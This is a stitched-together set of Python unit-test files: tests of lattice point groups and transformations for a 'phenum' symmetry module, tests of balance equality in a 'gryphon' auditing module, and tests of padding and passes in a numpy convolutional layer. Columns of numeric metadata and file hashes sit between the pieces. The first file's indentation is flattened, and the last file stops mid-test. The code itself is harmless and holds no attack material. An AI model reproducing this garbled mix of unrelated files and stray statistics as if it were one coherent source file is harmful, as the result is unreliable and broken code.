avecs = [[1,0,0],[0,1,0],[0.25,0,1]]
eps = 1E-6
out = _read_pg(gpath+"sm_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg12(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[0.5,0.5,0],[0.5,-0.5,0],[0.25,0,1]]
eps = 1E-6
out = _read_pg(gpath+"ccm_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
def test_getpg15(self):
from phenum.symmetry import get_lattice_pointGroup
avecs = [[1,1,0],[1,0,1],[0,0,2]]
eps = 1E-6
out = _read_pg(gpath+"fcc2_pg.out")
pg = get_lattice_pointGroup(avecs,eps)
present = []
for p in pg:
for g in out:
if np.allclose(p,g):
present.append(True)
self.assertEqual(len(out),len(present))
class TestGetTransformations(ut.TestCase):
"""Tests of the _get_transformations subroutine."""
def _compare_outputs(self,out1,out2):
ptc1 = out1[0]
ctp1 = out1[1]
ptc2 = out2[0]
ctp2 = out2[1]
for i in range(3):
for j in range(3):
self.assertAlmostEqual(ptc1[i][j],ptc2[i][j])
self.assertAlmostEqual(ctp1[i][j],ctp2[i][j])
def _trans_out(self,case):
ctp = np.transpose(_read_float_2D(gpath+"get_transformations_cart_to_prim.out."+str(case)))
ptc = np.transpose(_read_float_2D(gpath+"get_transformations_prim_to_cart.out."+str(case)))
return (ptc,ctp)
def test_1(self):
from phenum.symmetry import _get_transformations
case = 1
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_2(self):
from phenum.symmetry import _get_transformations
case = 2
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_3(self):
from phenum.symmetry import _get_transformations
case = 3
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_4(self):
from phenum.symmetry import _get_transformations
case = 4
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_5(self):
from phenum.symmetry import _get_transformations
case = 5
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_6(self):
from phenum.symmetry import _get_transformations
case = 6
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_7(self):
from phenum.symmetry import _get_transformations
case = 7
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_8(self):
from phenum.symmetry import _get_transformations
case = 8
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_9(self):
from phenum.symmetry import _get_transformations
case = 9
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_10(self):
from phenum.symmetry import _get_transformations
case = 10
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_11(self):
from phenum.symmetry import _get_transformations
case = 11
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_12(self):
from phenum.symmetry import _get_transformations
case = 12
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_13(self):
from phenum.symmetry import _get_transformations
case = 13
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_14(self):
from phenum.symmetry import _get_transformations
case = 14
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_15(self):
from phenum.symmetry import _get_transformations
case = 15
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_16(self):
from phenum.symmetry import _get_transformations
case = 16
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_17(self):
from phenum.symmetry import _get_transformations
case = 17
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_18(self):
from phenum.symmetry import _get_transformations
case = 18
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_19(self):
from phenum.symmetry import _get_transformations
case = 19
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
def test_20(self):
from phenum.symmetry import _get_transformations
case = 20
aVecs = _read_float_2D(gpath+"get_transformations_aVecs.in."+str(case))
out = self._trans_out(case)
self._compare_outputs(_get_transformations(aVecs),out)
class TestDoesMappingExist(ut.TestCase):
"""Tests of the _does_mapping_exist subroutine."""
def test_1(self):
from phenum.symmetry import _does_mapping_exist
case = 1
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_2(self):
from phenum.symmetry import _does_mapping_exist
case = 2
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_3(self):
from phenum.symmetry import _does_mapping_exist
case = 3
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_4(self):
from phenum.symmetry import _does_mapping_exist
case = 4
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_5(self):
from phenum.symmetry import _does_mapping_exist
case = 5
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_6(self):
from phenum.symmetry import _does_mapping_exist
case = 6
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_7(self):
from phenum.symmetry import _does_mapping_exist
case = 7
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_8(self):
from phenum.symmetry import _does_mapping_exist
case = 8
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_9(self):
from phenum.symmetry import _does_mapping_exist
case = 9
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_10(self):
from phenum.symmetry import _does_mapping_exist
case = 10
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_11(self):
from phenum.symmetry import _does_mapping_exist
case = 11
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_12(self):
from phenum.symmetry import _does_mapping_exist
case = 12
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_13(self):
from phenum.symmetry import _does_mapping_exist
case = 13
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_14(self):
from phenum.symmetry import _does_mapping_exist
case = 14
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_15(self):
from phenum.symmetry import _does_mapping_exist
case = 15
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_16(self):
from phenum.symmetry import _does_mapping_exist
case = 16
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_17(self):
from phenum.symmetry import _does_mapping_exist
case = 17
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_18(self):
from phenum.symmetry import _does_mapping_exist
case = 18
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_19(self):
from phenum.symmetry import _does_mapping_exist
case = 19
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
def test_20(self):
from phenum.symmetry import _does_mapping_exist
case = 20
v = _read_float_1D(gpath+"does_mapping_exist_v.in."+str(case))
this_type = _read_int(gpath+"does_mapping_exist_this_type.in."+str(case))
atom_pos = list(map(list,zip(*_read_float_2D(gpath+"does_mapping_exist_atom_pos.in."+str(case)))))
atomType = _read_int_1D(gpath+"does_mapping_exist_atomType.in."+str(case))
eps = _read_float(gpath+"does_mapping_exist_eps.in."+str(case))
out = _read_logical(gpath+"does_mapping_exist_mapped.out."+str(case))
self.assertEqual(_does_mapping_exist(v,this_type,atom_pos,atomType,eps),out)
| 55.991903
| 7,014
| 0.54739
| 12,737
| 69,150
| 2.799796
| 0.020099
| 0.145818
| 0.182468
| 0.197415
| 0.843386
| 0.839012
| 0.828664
| 0.822299
| 0.794453
| 0.766019
| 0
| 0.158827
| 0.236905
| 69,150
| 1,234
| 7,015
| 56.037277
| 0.51698
| 0.003977
| 0
| 0.831731
| 0
| 0
| 0.082534
| 0.079702
| 0
| 0
| 0
| 0
| 0.074038
| 1
| 0.108654
| false
| 0
| 0.1
| 0
| 0.225
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
965af649b5dd3520e2d2eb2bdb61b3c9f672b379
| 4,236
|
py
|
Python
|
gryphon/tests/logic/auditing/auditing_test.py
|
qiquanzhijia/gryphon
|
7bb2c646e638212bd1352feb1b5d21536a5b918d
|
[
"Apache-2.0"
] | 1,109
|
2019-06-20T19:23:27.000Z
|
2022-03-20T14:03:43.000Z
|
gryphon/tests/logic/auditing/auditing_test.py
|
qiquanzhijia/gryphon
|
7bb2c646e638212bd1352feb1b5d21536a5b918d
|
[
"Apache-2.0"
] | 63
|
2019-06-21T05:36:17.000Z
|
2021-05-26T21:08:15.000Z
|
gryphon/tests/logic/auditing/auditing_test.py
|
qiquanzhijia/gryphon
|
7bb2c646e638212bd1352feb1b5d21536a5b918d
|
[
"Apache-2.0"
] | 181
|
2019-06-20T19:42:05.000Z
|
2022-03-21T13:05:13.000Z
|
"""
Tests for gryphon.execution.auditing.
"""
import pyximport; pyximport.install()
import gryphon.lib; gryphon.lib.prepare()
import unittest
import sure
from gryphon.execution.lib import auditing
from gryphon.lib.money import Money
from gryphon.lib.models.exchange import Balance
class TestAuditing(unittest.TestCase):
def test_trivial(self):
db_balance = Balance()
ledger_balance = Balance()
auditing.balance_equality(db_balance, ledger_balance).should.equal(True)
def test_symmetric_equal(self):
db_balance = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
ledger_balance = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
auditing.balance_equality(db_balance, ledger_balance).should.equal(True)
def test_symmetric_not_equal(self):
db_balance = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
ledger_balance = Balance({'USD': Money('51', 'USD'), 'BTC': Money('0', 'BTC')})
auditing.balance_equality(db_balance, ledger_balance).should.equal(False)
def test_symmetric_very_not_equal(self):
db_balance = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
ledger_balance = Balance({
'USD': Money('-60', 'USD'),
'BTC': Money('100', 'BTC'),
})
auditing.balance_equality(db_balance, ledger_balance).should.equal(False)
def test_complex_symmetric_equal(self):
db_balance = Balance({
'USD': Money('50', 'USD'),
'CAD': Money('10000', 'CAD'),
'ETH': Money('0', 'ETH'),
'BTC': Money('0', 'BTC'),
})
ledger_balance = Balance({
'USD': Money('50', 'USD'),
'CAD': Money('10000', 'CAD'),
'ETH': Money('0', 'ETH'),
'BTC': Money('0', 'BTC'),
})
auditing.balance_equality(db_balance, ledger_balance).should.equal(True)
def test_complex_symmetric_not_equal(self):
db_balance = Balance({
'USD': Money('50', 'USD'),
'CAD': Money('10000', 'CAD'),
'ETH': Money('0', 'ETH'),
'BTC': Money('0', 'BTC'),
})
ledger_balance = Balance({
'USD': Money('50', 'USD'),
'CAD': Money('10000', 'CAD'),
'ETH': Money('-1000', 'ETH'),
'BTC': Money('-5000', 'BTC'),
})
auditing.balance_equality(db_balance, ledger_balance).should.equal(False)
def test_asymmetric_equal(self):
db_balance = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
ledger_balance = Balance({'USD': Money('50', 'USD')})
auditing.balance_equality(db_balance, ledger_balance).should.equal(True)
def test_asymmetric_not_equal(self):
db_balance = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
ledger_balance = Balance({'USD': Money('51', 'USD')})
auditing.balance_equality(db_balance, ledger_balance).should.equal(False)
def test_asymmetric_very_not_equal(self):
db_balance = Balance({'USD': Money('50', 'USD'), 'BTC': Money('0', 'BTC')})
ledger_balance = Balance({'USD': Money('-10000', 'USD')})
auditing.balance_equality(db_balance, ledger_balance).should.equal(False)
def test_complex_asymmetric_equal(self):
db_balance = Balance({
'USD': Money('50', 'USD'),
'CAD': Money('10000', 'CAD'),
'ETH': Money('0', 'ETH'),
'BTC': Money('0', 'BTC'),
})
ledger_balance = Balance({
'USD': Money('50', 'USD'),
'CAD': Money('10000', 'CAD'),
})
auditing.balance_equality(db_balance, ledger_balance).should.equal(True)
def test_complex_asymmetric_not_equal(self):
db_balance = Balance({
'USD': Money('50', 'USD'),
'CAD': Money('10000', 'CAD'),
'ETH': Money('0', 'ETH'),
'BTC': Money('0', 'BTC'),
})
ledger_balance = Balance({
'USD': Money('50', 'USD'),
'CAD': Money('-10000', 'CAD'),
})
auditing.balance_equality(db_balance, ledger_balance).should.equal(False)
| 33.09375
| 87
| 0.563975
| 480
| 4,236
| 4.79375
| 0.1
| 0.08605
| 0.147762
| 0.191221
| 0.841808
| 0.841808
| 0.841808
| 0.841808
| 0.841808
| 0.841808
| 0
| 0.035231
| 0.249528
| 4,236
| 127
| 88
| 33.354331
| 0.688581
| 0.008735
| 0
| 0.659341
| 0
| 0
| 0.098114
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.120879
| false
| 0
| 0.076923
| 0
| 0.208791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9698e268f86e6347212d131f5ebee63f29c355a3
| 11,647
|
py
|
Python
|
01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_convolutional.py
|
angliu-bu/ILearnDeepLearning.py
|
12819d6c32735a2d7277097e712adb04bd766081
|
[
"MIT"
] | 1,093
|
2018-09-07T07:15:29.000Z
|
2022-03-09T16:40:42.000Z
|
01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_convolutional.py
|
angliu-bu/ILearnDeepLearning.py
|
12819d6c32735a2d7277097e712adb04bd766081
|
[
"MIT"
] | 30
|
2018-09-20T02:41:40.000Z
|
2022-02-10T01:37:19.000Z
|
01_mysteries_of_neural_networks/06_numpy_convolutional_neural_net/tests/layers/unit_tests/test_convolutional.py
|
angliu-bu/ILearnDeepLearning.py
|
12819d6c32735a2d7277097e712adb04bd766081
|
[
"MIT"
] | 456
|
2018-09-09T19:14:16.000Z
|
2022-03-18T16:34:53.000Z
|
import numpy as np
import pytest
from src.errors import InvalidPaddingModeError
from src.layers.convolutional import ConvLayer2D, FastConvLayer2D, \
SuperFastConvLayer2D
class TestConvLayer2D:
def test_pad_symmetrical(self):
# given
array = np.random.rand(100, 28, 28, 3)
pad = 3, 3
# when
result = ConvLayer2D.pad(array=array, pad=pad)
# then
print(result.sum())
print(array.sum())
assert result.shape == (100, 34, 34, 3)
assert abs(result.sum() - array.sum()) < 1e-8
def test_pad_asymmetrical(self):
# given
array = np.random.rand(100, 28, 28, 3)
pad = 3, 5
# when
result = ConvLayer2D.pad(array=array, pad=pad)
# then
print(result.sum())
print(array.sum())
assert result.shape == (100, 34, 38, 3)
assert abs(result.sum() - array.sum()) < 1e-8
def test_calculate_pad_width_with_valid_padding(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
padding = 'valid'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
result = layer.calculate_pad_dims()
# then
assert result == (0, 0)
def test_calculate_pad_width_with_same_padding_symmetrical(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
padding = 'same'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
result = layer.calculate_pad_dims()
# then
assert result == (2, 2)
def test_calculate_pad_width_with_same_padding_asymmetrical(self):
# given
w = np.random.rand(5, 7, 3, 16)
b = np.random.rand(16)
padding = 'same'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
result = layer.calculate_pad_dims()
# then
assert result == (2, 3)
def test_calculate_pad_width_with_invalid_padding_value(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
padding = 'lorem ipsum'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
with pytest.raises(InvalidPaddingModeError):
_ = layer.calculate_pad_dims()
def test_calculate_output_dims_with_same_padding_symmetrical(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
padding = 'same'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
result = layer.calculate_output_dims((32, 11, 11, 3))
# then
assert result == (32, 11, 11, 16)
def test_calculate_output_dims_with_same_padding_asymmetrical(self):
# given
w = np.random.rand(3, 5, 3, 16)
b = np.random.rand(16)
padding = 'same'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
result = layer.calculate_output_dims((32, 11, 11, 3))
# then
assert result == (32, 11, 11, 16)
def test_calculate_output_dims_with_valid_padding_symmetrical(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
padding = 'valid'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
result = layer.calculate_output_dims((32, 11, 11, 3))
# then
assert result == (32, 7, 7, 16)
def test_calculate_output_dims_with_valid_padding_asymmetrical(self):
# given
w = np.random.rand(3, 5, 3, 16)
b = np.random.rand(16)
padding = 'valid'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
result = layer.calculate_output_dims((32, 11, 11, 3))
# then
assert result == (32, 9, 7, 16)
def test_calculate_output_dims_with_invalid_padding_value(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
padding = 'lorem ipsum'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
with pytest.raises(InvalidPaddingModeError):
_ = layer.calculate_output_dims((32, 11, 11, 3))
def test_forward_pass_with_same_padding(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
activation = np.random.rand(16, 11, 11, 3)
padding = 'same'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
result = layer.forward_pass(activation, training=True)
assert result.shape == (16, 11, 11, 16)
expected_val = np.sum(w[:, :, :, 0] * activation[0, 0:5, 0:5, :]) + b[0]
assert abs(expected_val - result[0, 2, 2, 0]) < 1e-8
def test_forward_pass_with_valid_padding(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
activation = np.random.rand(16, 11, 11, 3)
padding = 'valid'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
result = layer.forward_pass(activation, training=True)
assert result.shape == (16, 7, 7, 16)
expected_val = np.sum(w[:, :, :, 0] * activation[0, 0:5, 0:5, :]) + b[0]
assert abs(expected_val - result[0, 0, 0, 0]) < 1e-8
def test_forward_pass_with_invalid_padding_value(self):
# given
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
activation = np.random.rand(16, 11, 11, 3)
padding = 'lorem ipsum'
# when
layer = ConvLayer2D(w=w, b=b, padding=padding)
with pytest.raises(InvalidPaddingModeError):
_ = layer.forward_pass(activation, training=True)
def test_backward_pass_only_size_same_padding(self):
# given
activation = np.random.rand(64, 11, 11, 3)
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
layer = ConvLayer2D(w=w, b=b, padding='same')
# when
forward_result = layer.forward_pass(activation, training=True)
backward_result = layer.backward_pass(forward_result)
# then
assert backward_result.shape == activation.shape
def test_backward_pass_only_size_valid_padding(self):
# given
activation = np.random.rand(64, 11, 11, 3)
w = np.random.rand(5, 5, 3, 16)
b = np.random.rand(16)
